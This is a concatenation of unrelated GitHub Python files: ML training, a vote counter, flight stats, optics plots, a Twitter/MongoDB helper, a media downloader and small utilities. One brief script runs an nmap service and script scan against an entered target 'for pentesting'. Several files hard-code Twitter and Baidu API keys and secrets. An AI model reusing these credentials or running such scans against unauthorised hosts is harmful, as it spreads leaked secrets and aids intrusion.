make_padded_input_tensor(train_data, input_indexer, input_max_len, reverse_input=False)\n all_test_input_data = make_padded_input_tensor(dev_data, input_indexer, input_max_len, reverse_input=False)\n\n output_max_len = np.max(np.asarray([len(ex.y_indexed) for ex in train_data]))\n all_train_output_data = make_padded_output_tensor(train_data, output_indexer, output_max_len)\n all_test_output_data = make_padded_output_tensor(dev_data, output_indexer, output_max_len)\n\n if args.print_dataset:\n print(\"Train length: %i\" % input_max_len)\n print(\"Train output length: %i\" % np.max(np.asarray([len(ex.y_indexed) for ex in train_data])))\n print(\"Train matrix: %s; shape = %s\" % (all_train_input_data, all_train_input_data.shape))\n\n print(f\"input_max_len: {input_max_len}\")\n print(f\"train input data sample: {all_train_input_data[2]}\")\n print(f\"output_max_len: {output_max_len}\")\n print(f\"train output data sample: {all_train_output_data[2]}\")\n\n # print(f\"train token: {input_indexer.get_object(all_train_input_data[2][1])}\")\n print(f\"output_indexer: {output_indexer}\")\n\n # First create a model. Then loop over epochs, loop over examples, and given some indexed words\n # call your seq-to-seq model, accumulate losses, update parameters\n\n model = Seq2SeqSemanticParser(input_indexer, output_indexer, emb_dim=200, hidden_size=200,\n decoder_len_limit=args.decoder_len_limit)\n # print(f\"len: {type(len(train_data[2].x_indexed))}\")\n\n learning_rate = 0.001\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n epochs = 5\n # rate = 1\n rate = 0.8\n for epoch in range(epochs):\n total_loss = 0\n for i in range(len(train_data)):\n outputs = model.forward(all_train_input_data[i], input_max_len,\n all_train_output_data[i], output_max_len, rate)\n optimizer.zero_grad()\n loss = torch.zeros(1)\n sentence_len = len(train_data[i].y_indexed)\n for j in range(outputs.shape[0]):\n gold = int(all_train_output_data[i][j])\n if output_indexer.get_object(gold) == '':\n break\n loss += -outputs[j][gold]\n\n loss = loss/sentence_len\n total_loss += loss.item()\n loss.backward()\n optimizer.step()\n # print(f\"temp: {outputs.shape}\")\n # print(f\"pred sentence: {torch.argmax(outputs, dim=1)}\")\n\n print(f\"total loss on epoch {epoch}: {total_loss}\")\n # evaluate(index_data(train_data, input_indexer, output_indexer, output_max_len),\n # decoder=model, use_java=False)\n\n return model\n\n","repo_name":"ck44liu/NLP-tasks","sub_path":"seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":28104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12662476979","text":"# Nomes: Felype Nunes RM: 96232 | Lais Leme RM: 94660\r\n\r\nprint('=-=' * 20)\r\ncand1 = 'Joaquim Francisco'\r\ncand2 = 'Miguel Arraes'\r\nprint(f'Candidato 1:{cand1}\\nCandidato 2: {cand2}')\r\nprint('=-=' * 20)\r\nvotos = []\r\nvotosN = 0\r\nvoto1 = 0\r\nvoto2 = 0\r\nx = 0\r\nwhile x == 0:\r\n voto = int(input(f'Digite 1 para {cand1}, 2 para {cand2} \\nou outro numero para voto nulo (digite 0 para encerrar a votação) : '))\r\n if voto != 0:\r\n votos.append(voto)\r\n elif voto == 0:\r\n print('=-=' * 20)\r\n print('Votação encerrada!')\r\n print(f'Os votos foram esses : {votos}.')\r\n print('=-=' * 20)\r\n voto1 = votos.count(1)\r\n voto2 = votos.count(2)\r\n for nulos in votos:\r\n if nulos != 1 and nulos != 2:\r\n votosN += 1\r\n eleitores = len(votos)\r\n print(f'A quantidade de votos do Candidato {cand1} foi: {voto1} sendo {voto1/eleitores*100:.2f}% dos votos')\r\n print(f'A quantidade de votos do Candidato {cand2} foi: {voto2} sendo {voto2/eleitores*100:.2f}% dos votos')\r\n print(f'A quantidade de votos nulos foi: {votosN} sendo {votosN/eleitores*100:.2f}% dos votos')\r\n print('=-=' * 20)\r\n x += 1","repo_name":"felps2003/Aulas-de-Python-da-FIAP","sub_path":"projetoUrnaEletronica.py","file_name":"projetoUrnaEletronica.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11553335998","text":"file12 = open(\"9.12抵达航班.txt\",'r',encoding='UTF-8')\nfile13 = open(\"9.13抵达航班.txt\",'r',encoding='UTF-8')\nlines12 = file12.read().splitlines()\nlines13 = file13.read().splitlines()\ntime12 = lines12[3::7]\ntime13 = lines13[3::7]\ndict = {}\nfor i in time12:\n if dict.__contains__('2019-09-12 '+i):\n dict['2019-09-12 '+i] += 1\n else:\n dict['2019-09-12 '+i] = 1\nfor i in time13:\n if dict.__contains__('2019-09-13 '+i):\n dict['2019-09-13 '+i] += 1\n else:\n dict['2019-09-13 '+i] = 1 \nto = open('航班统计.csv','w',encoding='GBK') \nfor i , j in dict.items():\n to.write(i + ',' + str(j) + '\\n')","repo_name":"nooblyh/2019CUMCM","sub_path":"附录2-flight_stats.py","file_name":"附录2-flight_stats.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12099704767","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 9 11:27:50 2019\n\n@author: J.Wienand\n\"\"\"\n\nimport math\nfrom pandas import DataFrame, read_csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport qm\nimport numpy as np\n\nc = 2.997*10**8\nwidth1 = 32800000\nwidth = 32800000\nwidth2 = 28800000\nqma = qm.QM()\n\nlambdas = np.arange(860e-9,893e-9, 0.1e-9)\n\npot_factors2 = list()\nfor lambdal in lambdas:\n pfactor = qma.PotPrefactorAntiMagic(lambdal, width, mf=2, pol=1)\n pot_factors2.append(pfactor)\n \npot_factors3 = list()\nfor lambdal in lambdas:\n pfactor = qma.PotPrefactorAntiMagic(lambdal, width, mf=3, pol=1)\n pot_factors3.append(pfactor)\n \npot_factors22 = list()\nfor lambdal in lambdas:\n pfactor = qma.PotPrefactorAntiMagic(lambdal, width, mf=2, pol=-1)\n pot_factors22.append(pfactor)\n \npot_factors32 = list()\nfor lambdal in lambdas:\n pfactor = qma.PotPrefactorAntiMagic(lambdal, width, mf=3, pol=-1)\n pot_factors32.append(pfactor)\n \npot_factors0 = list()\nfor lambdal in lambdas:\n d2wl=852e-9\n d1wl=894e-9\n pfactor = qma.PotPrefactor(lambdal, width2, d2wl) +qma.PotPrefactor(lambdal, width1, d1wl)\n pot_factors0.append(pfactor) \n \nplt.plot(lambdas*1e9, pot_factors2,label=\"$\\sigma_{+}, m_{F} = 2$\")\nplt.plot(lambdas*1e9, pot_factors3,label=\"$\\sigma_{+}, m_{F} = 3$\")\nplt.plot(lambdas*1e9, pot_factors22,label=\"$\\sigma_{-}, m_{F} = 2$\")\nplt.plot(lambdas*1e9, pot_factors32,label=\"$\\sigma_{-}, m_{F} = 3$\")\nplt.legend(frameon=False)\n#plt.plot(lambdas, pot_factors0)\nplt.axhline(0, color=\"grey\")\nplt.axvline(870.8, color=\"grey\") #sigma plus\nplt.axvline(888.6, color=\"grey\") #sigma minus\nplt.xlabel(\"$\\lambda$ (nm)\")\nplt.ylabel(\"$u_0$ ($m^2 s$)\")\nplt.ylim(-0.4e-34, 0.4e-34)\nplt.xlim(860,893)\nplt.savefig(\"antimagic.png\", dpi=250)\n\nprint(qma.PotPrefactorAntiMagic(870.8e-9, width, mf=3, pol=+1)/qma.PotPrefactorAntiMagic(888.6e-9, width, mf=3, pol=-1))\nprint(qma.ScattPrefactorAntiMagic(870.8e-9, width, mf=3, pol=+1)/qma.ScattPrefactorAntiMagic(888.6e-9, width, mf=3, pol=-1))","repo_name":"julianibus/cs-imaging","sub_path":"scattpot/mf880test.py","file_name":"mf880test.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1442890481","text":"import sys\nimport tweepy\nimport json\nimport pymongo\nimport datetime\nfrom pymongo import MongoClient\n\n\"\"\"/***********************************************************************/\"\"\"\n\n#inicia MongoDB e cria-se os bancos necessarios\nclient = MongoClient()\ndb = client['tweepy_database']\n\n\"\"\"/***********************************************************************/\"\"\"\n\nconsumer_key = 'x0GzRIsgrn6PiuxmON0qEEVBU'\nconsumer_secret = 'GApQR5aIeVCXxdV3ZLTdeiA6OGG6UQleHZnD8E2LBCJcdRAKZh'\naccess_token = '144667001-t3zoMPJOg8d9m0E21ukGsdMSdFPkF04fhu1BaMKO'\naccess_secret = 'e7VfVWDx6cj9dmMgwzM8mGEyNPNTimvFlE0D22D3fLPoD'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n\napi = tweepy.API(auth)\n\n\"\"\"/***********************************************************************/\"\"\"\n\n#myStreamListener = MyStreamListener()\n#myStream = tweepy.Stream(auth = api.auth, listener = myStreamListener)\n\n#myStream.filter(track=[name_to_search])\n#myStream.filter(track=[name_to_search], async=True)\n\n\"\"\"/***********************************************************************/\"\"\"\n\ndef getDataFromMongo(name_of_collection):\n collection = db[name_of_collection + '_tweepy_collections']\n stringVarialble = \" \"\n for post in collection.find():\n stringVarialble = stringVarialble + \"\\n\" + str(post)\n return stringVarialble\n\n#Referencias:\n#https://marcobonzanini.com/2015/03/02/mining-twitter-data-with-python-part-1/\n#http://adilmoujahid.com/posts/2015/01/interactive-data-visualization-d3-dc-python-mongodb/\n","repo_name":"marcelodive/BDA_clusterizacao","sub_path":"dataBacking.py","file_name":"dataBacking.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24491340405","text":"import requests\nimport json\nfrom googleapiclient.discovery import build\nimport pytube\nimport yt_dlp as youtube_dl\nfrom Scripts.Define import *\nimport re\nimport datetime\n\n# 获取图片\ndef search_images(finishCall,keyword,downloadCount):\n url = f\"https://www.googleapis.com/customsearch/v1?key={KEY_GOOGLE}&cx={KEY_GOOGLE_ENGINE_ID}&searchType=image&q={keyword}\"\n response = requests.get(url)\n data = json.loads(response.text)\n index = 0\n realCount = len(data[\"items\"])\n if downloadCount > realCount:\n downloadCount = realCount\n for item in data[\"items\"]:\n if index < downloadCount:\n index = index + 1\n img_url = item[\"link\"]\n img_data = requests.get(img_url).content\n with open(\"downloads/\"+str(index)+'image_name.jpg', 'wb') as f:\n f.write(img_data)\n\n finishCall()\n\n# 搜索视频\ndef search_videos(finishCall,keyword,downloadCount):\n\n # 指定API的开发者key和服务名称\n youtube_service_name = 'youtube'\n youtube_service_version = 'v3'\n\n # 指定搜索关键字和搜索类型\n search_type = 'video'\n\n # 构造API请求\n youtube = build(youtube_service_name, youtube_service_version, developerKey=KEY_GOOGLE)\n search_response = youtube.search().list(q=keyword, part='id,snippet', type=search_type).execute()\n\n # 处理搜索结果\n index = 0\n realCount = len(search_response.get('items', []))\n if downloadCount > realCount:\n downloadCount = realCount\n videos = []\n for search_result in search_response.get('items', []):\n if search_result['id']['kind'] == 'youtube#video':\n if index < downloadCount:\n index = index + 1\n videos.append('%s (%s)' % (search_result['snippet']['title'], search_result['id']['videoId']))\n video_url = \"https://www.youtube.com/watch?v=\" + search_result['id']['videoId']\n video = pytube.YouTube(video_url, use_oauth=True, allow_oauth_cache=True)\n stream = video.streams.get_highest_resolution()\n stream.download('downloads/',filename_prefix='video')\n\n finishCall()\n\n# 搜索音乐\ndef search_music(finishCall,keyword,downloadCount):\n # 设置youtube-dl的配置\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'outtmpl': 'downloads/%(title)s.%(ext)s',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n }\n\n # 搜索并获取结果\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n search_results = ydl.extract_info(f\"ytsearch:{keyword}\", download=False)\n\n # 下载音乐\n realCount = len(search_results['entries'])\n if downloadCount > realCount:\n downloadCount = realCount\n index = 0\n for result in search_results['entries']:\n if index < downloadCount:\n index = index + 1\n url = result['webpage_url']\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n\n finishCall()\n\n# 合成语音\ndef CombineVoice(finishCall,content):\n API_KEY = \"rbgFttY8GVuqiQgGGLZ10O97\"\n SECRET_KEY = \"S5IZgmxvEw8IShWWuUZuH0wkjWZBqBiL\"\n\n # 获取access_token\n url = \"https://aip.baidubce.com/oauth/2.0/token\"\n params = {\"grant_type\": \"client_credentials\", \"client_id\": API_KEY, \"client_secret\": SECRET_KEY}\n access_token = str(requests.post(url, params=params).json().get(\"access_token\"))\n\n # 创建合成请求\n # url = \"https://aip.baidubce.com/rpc/2.0/tts/v1/create?access_token=\" + access_token\n # payload = json.dumps({\n # \"text\": content,\n # \"format\": \"mp3-16k\",\n # \"lang\": \"zh\"\n # })\n # headers = {\n # 'Content-Type': 'application/json',\n # 'Accept': 'application/json'\n # }\n # response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n # print(response.json()[\"task_id\"])\n\n #下载已合成是音频 TODO 需要异步查询是否完成\n task_id_list = [ \n \"645847291eb6020001bb5a0b\"#response.json()[\"task_id\"], #64575e8e3064530001d312a4\n ]\n\n url = 'https://aip.baidubce.com/rpc/2.0/tts/v1/query' #查询长文本语音合成任务结果请求地址\n\n body = {\n \"task_ids\": task_id_list\n }\n token = {\"access_token\":access_token}\n headers = {'content-type': \"application/json\"}\n response = requests.post(url,params=token,data = json.dumps(body), headers = headers)\n img_data = requests.get(response.json()[\"tasks_info\"][0][\"task_result\"][\"speech_url\"]).content\n with open(\"downloads/\"+'image_name.mp3', 'wb') as f:\n f.write(img_data)\n \n finishCall()\n\n# CombineVoice(\"\"\"当我走在大街上时,我感到孤独和悲伤,仿佛整个世界都与我无关。街道两旁的人来人往,他们匆匆赶路,好像都在追赶着什么。但是我,我只是在这里漫步,默默地沉浸在自己的思绪中。\n# 我想起了过去的一些事情,那些美好的回忆仿佛就在昨天,但却再也无法重现。我想起了曾经的朋友和亲人,他们现在都不在我身边,让我感到更加孤独。我试图让自己忙碌起来,但是在这个拥挤的城市里,我还是感觉无处可去。\n# 大街上的人们都忙着追求自己的梦想,而我似乎迷失了方向。我不知道自己要去哪里,也不知道该怎样走下去。或许,这就是生活的真谛吧,我们都是在不停地寻找,寻找属于自己的方向,寻找属于自己的意义。\n# 我沉思了许久,终于意识到,生命中最重要的是如何面对这些痛苦和挑战。我们必须学会接受生活中的困难,去面对它们,去克服它们。当我们学会从挫折中坚强地站起来,我们就能够更加勇敢地面对未来。\n# 走在大街上,我看到许多人都在忙碌地奔波着,但是我现在明白了,人生不是一场竞赛,我们并不需要赢得所有的奖项或者被所有人认可。重要的是我们如何享受人生,如何在日复一日的平凡中找到自己的价值和意义。\n# 或许我还会在未来遇到更多的挫折和困难,但是我相信,只要我坚持走下去,我终将能够克服它们,找到自己的方向和意义。走在大街上的孤独和悲伤,终将被自己的坚强和勇气所替代\"\"\")\n\ndef CombineText(finishCall,content):\n # 每行字幕最大字符数\n MAX_CHARS_PER_LINE = 32\n\n # 分割文案,生成字幕列表\n subtitle_lines = []\n line = \"\"\n words = re.split('[,。]', content)\n for word in words:\n if len(line + \" \" + word) > MAX_CHARS_PER_LINE:\n subtitle_lines.append(line.strip())\n line = word\n else:\n line += \" \" + word\n if line:\n subtitle_lines.append(line.strip())\n\n # 生成 srt 文件内容\n srt_content = \"\"\n for i in range(len(subtitle_lines)):\n start_time = datetime.timedelta(seconds=i * 3) # 字幕出现时间\n end_time = datetime.timedelta(seconds=(i + 1) * 3) # 字幕消失时间\n srt_content += f\"{i + 1}\\n{start_time} --> {end_time}\\n{subtitle_lines[i]}\\n\\n\"\n\n # 将 srt 文件内容写入文件\n with open(\"downloads/subtitle.srt\", \"w\", encoding=\"utf-8\") as f:\n f.write(srt_content)\n \n finishCall()","repo_name":"xiaoyanxiansheng/HongHu","sub_path":"Client/Client/Project/Scripts/Download.py","file_name":"Download.py","file_ext":"py","file_size_in_byte":7338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42619688696","text":"from collections import defaultdict\n\n\nclass TimeMap:\n\n def __init__(self):\n self.dict = defaultdict(list)\n\n def set(self, key: str, value: str, timestamp: int) -> None:\n self.dict[key].append([timestamp, value])\n\n def get(self, key: str, timestamp: int) -> str:\n\n lo, hi = 0, len(self.dict[key])-1\n while lo <= hi:\n mid = lo + (hi-lo) // 2\n if timestamp == self.dict[key][mid][0]:\n return self.dict[key][mid][1]\n elif timestamp < self.dict[key][mid][0]:\n hi = mid - 1\n else:\n lo = mid + 1\n return '' if lo-1 < 0 else self.dict[key][lo-1][1]\n\n\n# Your TimeMap object will be instantiated and called as such:\n# obj = TimeMap()\n# obj.set(key,value,timestamp)\n# param_2 = obj.get(key,timestamp)\n\nif __name__ == '__main__':\n tm = TimeMap()\n tm.set('love', 'high', 10)\n tm.set('love', 'low', 20)\n print(tm.dict)\n print(tm.get('love', 5))\n print(tm.get('love', 10))\n print(tm.get('love', 15))\n print(tm.get('love', 20))\n print(tm.get('love', 25))\n","repo_name":"rjejoon/leetcode","sub_path":"solutions/medium/981_time_based_key_val_store.py","file_name":"981_time_based_key_val_store.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1643744620","text":"import json\n\n\n\nwith open('/home/hteam/Documents/han/paper/data/annotations.json') as json_file:\n annotation = json.load(json_file)\n test = {}\n train = {}\n test['images'] = annotation['images']\n train['images'] = annotation['images']\n test['type'] = annotation['type']\n train['type'] = annotation['type']\n test['annotations'] = []\n train['annotations'] = []\n\n count = 0\n for a in annotation['annotations']:\n if count % 250 == 0:\n #test\n test['annotations'].append(a)\n else:\n #train\n train['annotations'].append(a)\n\n count += 1\n\n test['categories'] = annotation['categories']\n train['categories'] = annotation['categories']\n\n with open('test.json', 'w') as outfile:\n json.dump(test, outfile)\n with open('train.json', 'w') as outfile:\n json.dump(train, outfile)\n ","repo_name":"existentmember7/detectron2_revise","sub_path":"slice_data.py","file_name":"slice_data.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28660703127","text":"#!/bin/python3\n#coded by U4I5 For pentesting\nimport nmap3\nsearchmap = nmap3.Nmap()\n#Target Ip address\nIp = input('[+] Target: ')\n\n#Interface\n#Iface = input(\"[+] Iface: \")\n\n# Scan Top 1000 ports with arguments : -Sv -sC \nresults = searchmap.scan_top_ports(target=Ip, args=\"-sV\" \"-sC\")\n\n\n\n","repo_name":"U4I5/searchmap","sub_path":"smap.py","file_name":"smap.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30750166097","text":"import time\nimport pyautogui as g\n\ncross, inspect, getdiv1, getdiv2, ashtml, notepad = (945,651), (1083,263), (1005,706), (1123,359), (1401,359), (89, 20)\n\ndef f(n):\n for i in range(n):\n g.click(cross)\n g.click(cross)\n g.click(inspect)\n g.click(getdiv1)\n g.click(getdiv2, button = 'right')\n g.click(ashtml)\n g.hotkey('ctrlleft', 'a', 'ctrlleft', 'c')\n g.click(notepad)\n g.hotkey('ctrlleft', 'v', 'ctrlleft', 's')\n\nf(50)\n","repo_name":"rbSparky/GSoC-Organisation-Search-by-Technologies","sub_path":"automationScript.py","file_name":"automationScript.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20417039509","text":"from addfile import *\nfrom deletefile import *\nfrom searchfile import *\nfrom renamefile import *\nfrom playfile import *\nfrom history import *\n\nimport time\nimport sys\n\n\ndef main_menu():\n\toptions = [\n\t\t\t'Add',\n\t\t\t'Delete',\n\t\t\t'Search',\n\t\t\t'Rename',\n\t\t\t'Play',\n\t\t\t'History',\n\t\t\t'exit'\n\t]\n\n\tclear_screen()\n\n\tprint('**********Main Menu**********')\n\tprint()\n\tprint()\n\n\t# Show options\n\tfor i,j in enumerate(options):\n\t\tprint(i+1,j)\n\n\n\tprint()\n\tprint()\n\n\n\tselection = input('Enter choice: ')\n\n\t# call function according to choice\n\n\tif selection=='1':\n\n\t\tadd_file()\n\n\telif selection=='2':\n\t\t\n\t\tdelete_file()\n\n\n\telif selection=='3':\n\t\t\n\t\tsearch_file()\n\n\telif selection=='4':\n\t\t\n\t\trename_file()\n\n\telif selection=='5':\n\t\t\n\t\tplay_file()\n\n\telif selection=='6':\n\t\t\n\t\tshow_history()\n\n\telse:\n\n\t\tclear_screen()\n\t\tsys.exit()\n\n\ttime.sleep(2)\n\t# To return to main menu\n\tmain_menu()","repo_name":"Prometheus7-creator/video-library-management","sub_path":"main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14021924795","text":"\"\"\"\nLAUSCHER – Flexible Auditory Spike Conversion Chain\n\nReference: https://arxiv.org/abs/1910.07407\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nfrom os.path import isfile\nimport matplotlib.pyplot as plt\n\nfrom lauscher.audiowaves import FileMonoAudioWave\nfrom lauscher.helpers import CommandLineArguments\nfrom lauscher.transformations.wave2spike import Wave2Spike\n\n\ndef main(args,\n input_file: str,\n output_file: str,\n num_channels: int):\n if not isfile(input_file):\n raise IOError(f\"Input file '{input_file}' not found.\")\n\n trafo = Wave2Spike(num_channels=num_channels, args=args)\n spikes = FileMonoAudioWave(input_file).transform(trafo)\n _, ax = plt.subplots()\n spikes.plot(ax)\n spikes.export(output_file)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"input_file\", type=str,\n help=\"Path to the input wave file, to be converted to\"\n \"a spike train.\")\n parser.add_argument(\"output_file\", type=str,\n help=\"Path to the output file, spike trains will ber\"\n \"written into it.\")\n parser.add_argument(\"--num_channels\", type=int, default=700,\n help=\"Number of frequency selective channels.\")\n parser.add_argument(\"-j\", \"--jobs\", type=int, default=None,\n help=\"Number of concurrent jobs used for data \"\n \"processing.\")\n parser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\",\n action=\"store_true\")\n \n # Model parameters\n # BM model \n parser.add_argument(\"--bm_channels\", type=int, default=700,\n help=\"Number of frequency selective channels in the BM.\") #???\n parser.add_argument(\"--bm_a\", type=int, default=3500,\n help=\"Greenwoods constant.\")\n parser.add_argument(\"--bm_alpha\", type=float, default=3.0,\n help=\"Attenuation factor.\")\n parser.add_argument(\"--bm_rho\", type=float, default=1.0,\n help=\"Parameter in deriv of velocity.\")\n parser.add_argument(\"--bm_c\", type=float, default=3.5,\n help=\"EXPL.\")\n parser.add_argument(\"--bm_c0\", type=float, default=10e8,\n help=\"Stiffness constant.\")\n parser.add_argument(\"-bm_de\", type=float, default=0.15,\n help=\"EXPL.\")\n parser.add_argument(\"--bm_h\", type=float, default=0.1,\n help=\"Height of scaling.\")\n parser.add_argument(\"--bm_m\", type=float, default=0.05,\n help=\"Effective mass.\")\n \n # HC model\n parser.add_argument(\"--hc_y\", type=float, default=5.05,\n help=\"Replenishing rate.\")\n parser.add_argument(\"--hc_g\", type=float, default=2000.0,\n help=\"Max. permeability.\")\n parser.add_argument(\"--hc_l\", type=float, default=2500.0,\n help=\"Loss rate.\")\n parser.add_argument(\"--hc_r\", type=float, default=6580.0,\n help=\"Reuptake rate.\")\n parser.add_argument(\"--hc_x\", type=float, default=66.3,\n help=\"EXPL.\")\n parser.add_argument(\"--hc_a\", type=float, default=5.0,\n help=\"Permeability offset.\")\n parser.add_argument(\"--hc_b\", type=float, default=300.0,\n help=\"Permeability rate.\")\n parser.add_argument(\"--hc_h\", type=float, default=50000.0,\n help=\"Probability scaling.\")\n parser.add_argument(\"--hc_m\", type=float, default=1.0,\n help=\"EXPL.\")\n \n # BC model\n parser.add_argument(\"--bc_n_convergence\", type=int, default=40,\n help=\"Number of hair cells per BM measuring point?.\")\n parser.add_argument(\"--bc_tau_mem\", type=float, default=1e-3,\n help=\"Membrane time constant.\")\n parser.add_argument(\"--bc_tau_syn\", type=float, default=5e-4,\n help=\"Synapse time constant.\")\n parser.add_argument(\"--bc_tau_refrac\", type=float, default=1e-3,\n help=\"Refractory period time constant.\")\n parser.add_argument(\"--bc_weight\", type=float, default=13e3,\n help=\"weights to the bc.\")\n \n \n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.INFO)\n else:\n logging.basicConfig(level=logging.WARNING)\n \n\nsmall_dataset_folder = './small_dataset'\n\n# Iterate over the files in the 'small_dataset' folder\nfor filename in os.listdir(small_dataset_folder):\n if filename.endswith('.flac'):\n # Get the input file path\n input_file = os.path.join(small_dataset_folder, filename)\n \n # Set the output file name to be the same as the input file name\n output_file = os.path.splitext(filename)[0]\n print('input_file: ', input_file, 'output_file: ', output_file)\n \n # Call the main function for each file\n main(args, input_file, output_file, args.num_channels)\n\n # global_args = CommandLineArguments()\n # global_args.num_concurrent_jobs = args.jobs\n# main(args, args.input_file, args.output_file, args.num_channels)\n","repo_name":"Petra12345/cochlea_model","sub_path":"lauscher/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30083979437","text":"import ast\nfrom time import time\n\n\nclass Packet:\n def __init__(self, input_list):\n self.master_list = input_list\n self.flat_list = list()\n self.index = -1\n self.flatten_list([self.master_list])\n\n def flatten_list(self, input_list):\n length = len(input_list)\n index = 0\n for _ in range(length):\n item = input_list[index]\n is_list = True if type(item) is list else False\n previous_item = input_list[index - 1] if index > 0 else None\n next_item = input_list[index + 1] if index + 1 < length else None\n self.flat_list.append(\n {\n \"item\": item,\n \"is_list\": is_list,\n \"previous\": previous_item,\n \"next\": next_item,\n }\n )\n if is_list:\n self.flatten_list(input_list=item)\n index += 1\n\n\ndef is_ordered(packet_pair):\n l_packet = Packet(packet_pair[0])\n r_packet = Packet(packet_pair[1])\n l_was_integer = False\n r_was_integer = False\n\n l, r = 0, 0\n while l < len(l_packet.flat_list):\n l_item = l_packet.flat_list[l]\n try:\n r_item = r_packet.flat_list[r]\n except IndexError:\n return False\n l += 1\n r += 1\n\n # Both values are integers\n if not l_item[\"is_list\"] and not r_item[\"is_list\"]:\n if l_item[\"item\"] < r_item[\"item\"]:\n return True\n elif l_item[\"item\"] > r_item[\"item\"]:\n return False\n elif l_item[\"item\"] == r_item[\"item\"]:\n\n # Previous comparison was list against number\n if r_was_integer:\n return False\n elif l_was_integer:\n return True\n\n # List ends for one of the two\n elif l_item[\"next\"] is None and r_item[\"next\"] is not None:\n return True\n elif l_item[\"next\"] is not None and r_item[\"next\"] is None:\n return False\n continue\n\n # Both values are lists\n elif l_item[\"is_list\"] and r_item[\"is_list\"]:\n if len(l_item[\"item\"]) == 0 and len(r_item[\"item\"]) > 0:\n return True\n elif len(l_item[\"item\"]) > 0 and len(r_item[\"item\"]) == 0:\n return False\n continue\n\n # One value is list\n elif l_item[\"is_list\"] and not r_item[\"is_list\"]:\n if len(l_item[\"item\"]) == 0:\n return True\n r -= 1\n r_was_integer = True\n continue\n elif not l_item[\"is_list\"] and r_item[\"is_list\"]:\n if len(r_item[\"item\"]) == 0:\n return False\n l -= 1\n l_was_integer = True\n continue\n if len(l_packet.flat_list) == 0:\n return True\n\n\nall_packets = [\n [ast.literal_eval(line.split(\"\\n\")[0]), ast.literal_eval(line.split(\"\\n\")[1])]\n for line in open(\"13/input.txt\", \"r\").read().strip().split(\"\\n\\n\")\n]\n\n# Part 1\nresult = sum([i + 1 for i, pair in enumerate(all_packets) if is_ordered(pair)])\nprint(f\"Part 1: {result}\")\n\n# Part 2\nleft = [[2]]\nright = [[6]]\na = time()\nl_score = 1\nr_score = 2\nfor packet in all_packets:\n for item in packet:\n if is_ordered([item, left]):\n l_score += 1\n r_score += 1\n elif is_ordered([item, right]):\n r_score += 1\nprint(f\"Part 2: {l_score * r_score}\")\n","repo_name":"panosprotopapas/AdventOfCode2022","sub_path":"13/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74119449126","text":"from dataclasses import dataclass\nfrom contextlib import contextmanager\n\nimport pandas as pd\n\nfrom alexflow.core import Output\n\n\n@dataclass(frozen=True)\nclass H5FileOutput(Output):\n def store(self, data):\n raise NotImplementedError(\"store API is not supported. Use #open API instead.\")\n\n @contextmanager\n def open(self, complevel: int = 1, complib: str = \"blosc:zstd\") -> pd.HDFStore:\n assert self.storage is not None, f\"storage must be given for {self.key}\"\n with self.storage.path(self.key, mode=\"w\") as path:\n with pd.HDFStore(path, mode=\"w\", complevel=complevel, complib=complib) as s:\n yield s\n\n @contextmanager\n def load(self) -> pd.HDFStore:\n assert self.storage is not None, f\"storage must be given for {self.key}\"\n with self.storage.path(self.key, mode=\"r\") as path:\n with pd.HDFStore(path) as store:\n yield store\n","repo_name":"AlpacaTechJP/alexflow","sub_path":"alexflow/adapters/output/h5store.py","file_name":"h5store.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"34212069670","text":"from time import time, localtime, strftime\ntry:\n\tfrom Tkinter import *\nexcept ImportError:\n\tfrom tkinter import *\n\ntry:\n\tfrom \t\ttkColorChooser import askcolor\nexcept ImportError:\n\tfrom\t\ttkinter.colorchooser import askcolor\ntry:\n\timport 